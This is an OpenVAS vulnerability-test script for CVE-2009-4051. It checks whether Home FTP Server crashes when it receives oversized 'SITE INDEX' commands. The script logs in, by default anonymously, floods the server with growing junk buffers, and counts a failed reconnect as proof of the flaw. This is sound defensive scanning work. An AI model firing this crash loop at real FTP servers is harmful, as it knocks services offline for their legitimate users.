###############################################################################
# OpenVAS Vulnerability Test
# $Id: home_ftp_server_37033.nasl 7876 2010-06-01 11:02:32Z mime $
#
# Home FTP Server 'SITE INDEX' Command Remote Denial of Service Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100351);
 script_tag(name:"cvss_base", value:"5.0");
 script_cve_id("CVE-2009-4051");
 script_bugtraq_id(37033);
 script_version ("1.0-$Revision: 7876 $");
 script_tag(name:"risk_factor", value:"Medium");

 script_name("Home FTP Server 'SITE INDEX' Command Remote Denial of Service Vulnerability");

desc = "Overview:
Home FTP Server is prone to a remote denial-of-service vulnerability
because it fails to handle user-supplied input.

Successfully exploiting this issue allows remote attackers to crash
the affected application, denying service to legitimate users.

References:
http://www.securityfocus.com/bid/37033
http://downstairs.dnsalias.net/homeftpserver.html
http://www.securityfocus.com/archive/1/507893

Risk factor : Medium";

 script_description(desc);
 script_summary("Determine if Home FTP Server is prone to a remote denial-of-service vulnerability");
 script_category(ACT_DENIAL);
 script_family("FTP");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

include("ftp_func.inc");

if(safe_checks())exit(0);

ftpPort = get_kb_item("Services/ftp");
if(!ftpPort){
  ftpPort = 21;
}

if(get_kb_item('ftp/'+ftpPort+'/broken'))exit(0);

if(!get_port_state(ftpPort)){
  exit(0);
}

soc1 = open_sock_tcp(ftpPort);
if(!soc1){
  exit(0);
}

domain = get_kb_item("Settings/third_party_domain");
if(isnull(domain)) {
 domain = this_host_name();;
}    

user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");

if(!user)user = "anonymous";
if(!pass)pass = string("openvas@", domain);;

login_details = ftp_log_in(socket:soc1, user:user, pass:pass);

if(login_details)
{

 for(i=0; i<30; i++) {
   data = crap(length: (40*i));
   ftp_send_cmd(socket: soc1, cmd: string("SITE INDEX ",data));
 }

 close(soc1);
 sleep(3);
 soc = open_sock_tcp(ftpPort);

 if(!soc) {
  security_warning(port:ftpPort);
  exit(0);
 }  

}

exit(0); 

     
